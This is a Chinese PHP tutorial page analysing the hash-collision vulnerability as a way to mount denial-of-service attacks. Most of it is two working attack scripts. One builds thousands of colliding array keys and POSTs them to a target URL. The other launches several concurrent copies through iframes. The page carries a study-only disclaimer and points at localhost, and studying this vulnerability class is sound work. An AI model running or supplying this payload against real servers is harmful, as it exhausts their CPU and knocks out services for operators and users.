当前位置:首页 > PHP教程 > php应用 > 列表

PHP利用hash冲突漏洞进行DDoS攻击的方法分析

发布:smiling 来源: PHP粉丝网  添加日期:2021-05-18 20:25:29 浏览: 评论:0 

本文实例分析了PHP利用hash冲突漏洞进行DDoS攻击的方法,分享给大家供大家参考,具体分析如下:

首先声明:本文内容只用于研究学习使用,请勿用于非法行为!

前面提到过最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。

不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.php

  1. // 目标地址  
  2. // 只要目标地址存在,不用管它是干嘛的  
  3. $host = 'http://127.0.0.1/test.php'
  4. $data = ''
  5. $size = pow(2, 15); 
  6. for ($key=0, $max=($size-1)*$size$key<=$max$key+=$size
  7.   $data .= '&array[' . $key . ']=0'
  8. $ret = curl($host, ltrim($data,'&'));  
  9. var_dump($ret);  
  10. function curl($url$post$timeout = 30){ 
  11.   $ch = curl_init(); 
  12.   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
  13.   curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);  
  14.   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5); 
  15.   curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:')); 
  16.   curl_setopt($ch, CURLOPT_URL, $url); 
  17.   curl_setopt($ch, CURLOPT_POST, true); 
  18.   curl_setopt($ch, CURLOPT_POSTFIELDS, $post); 
  19.   $output = curl_exec($ch); 
  20.   if ($output === false) return false; 
  21.   $info = curl_getinfo($ch); 
  22.   $http_code = $info['http_code']; 
  23.   if ($http_code == 404) return false; 
  24.   curl_close($ch); 
  25.   return $output

文件:ddos.php

  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
  2. <html xmlns="http://www.w3.org/1999/xhtml">  
  3. <head>  
  4. <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  
  5. <title>DDOS</title>  
  6. </head>  
  7. <body>  
  8. <?php  
  9. for($i=0; $i<5; $i++){//并发数  
  10.   echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';  
  11. }  
  12. ?>  
  13. </body>  
  14. </html>

Tags: hash DDoS

分享到: